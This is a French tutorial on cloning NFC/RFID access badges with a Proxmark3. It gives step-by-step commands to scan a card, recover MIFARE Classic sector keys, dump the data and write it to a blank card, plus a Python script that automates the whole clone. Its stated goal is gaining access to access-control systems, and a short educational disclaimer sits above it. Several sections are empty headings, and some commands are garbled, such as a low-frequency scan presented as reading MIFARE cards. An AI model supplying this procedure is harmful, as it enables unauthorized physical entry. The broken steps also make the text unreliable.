⚠️ Avertissement

Ce tutoriel est fourni à des fins éducatives uniquement. L’utilisation de ces techniques sans autorisation explicite pour manipuler ou cloner des badges NFC/RFID est illégale et peut entraîner des poursuites judiciaires. Utilisez ces techniques uniquement dans le cadre de tests de sécurité légitimes pour renforcer la sécurité des systèmes de contrôle d’accès.

Extraction de Données NFC avec Proxmark3

Objectif

Utiliser le Proxmark3 pour cloner et manipuler des badges NFC/RFID en vue d'accéder à des systèmes de contrôle d’accès ou d’acquérir des informations sur des dispositifs NFC/RFID.

Prérequis

Tutoriel détaillé

1. Installation et Configuration du Proxmark3

2. Lancement de l'Interface Client Proxmark3

Une fois le Proxmark3 configuré, lancez l’interface client :

sudo ./proxmark3 /dev/ttyACM0

/dev/ttyACM0 est l’emplacement typique pour le Proxmark3. Vérifiez avec dmesg si nécessaire pour trouver le bon chemin.

3. Scannage des Badges NFC/RFID

Placez le badge à cloner sur le Proxmark3 et utilisez la commande suivante pour scanner la carte :

lf search

Cela va chercher les informations sur la carte/badge. Vous verrez des détails comme le type de carte (ex. : MIFARE Classic), l’identifiant, et d’autres informations.

4. Clonage d’un Badge NFC (Ex. : MIFARE Classic)

Si c'est une carte MIFARE, lancez la commande suivante pour récupérer les clés d’accès de chaque secteur :

hf mf mifare

Pour copier la carte une fois les clés récupérées :

hf mf dump

Sauvegardez le dump avec un nom précis :

hf mf save mybadge.bin

5. Écriture du Badge Cloné sur une Carte Vierge

Utilisez une carte vierge compatible et placez-la sur le Proxmark3. Chargez ensuite le dump précédemment enregistré :

hf mf restore mybadge.bin

Cette opération va écrire les informations clonées sur la carte vierge, rendant cette dernière identique à la carte originale.

6. Exploitation et Tests

7. Sécurisation et Bonnes Pratiques

Script Python pour Automatisation des Tâches

Nous pouvons créer un script Python pour automatiser la lecture, le clonage, et l’écriture de badges avec le Proxmark3 en utilisant l’interface CLI.


import os

def scan_badge():
    print("Scanning for badges...")
    os.system("proxmark3 /dev/ttyACM0 'lf search'")

def dump_badge(filename):
    print(f"Dumping badge data to {filename}...")
    os.system(f"proxmark3 /dev/ttyACM0 'hf mf dump' > {filename}")

def clone_badge(filename):
    print(f"Cloning badge from {filename}...")
    os.system(f"proxmark3 /dev/ttyACM0 'hf mf restore {filename}'")

if __name__ == "__main__":
    print("NFC Badge Cloner with Proxmark3")
    scan_badge()
    dump_filename = "mybadge.bin"
    dump_badge(dump_filename)
    clone_badge(dump_filename)
    print("Badge cloning completed.")
        

Validation et Compatibilité

Tester sur différents types de badges NFC/RFID pour s'assurer que le script et la procédure fonctionnent bien sur les modèles communément utilisés (MIFARE, HID iCLASS, etc.).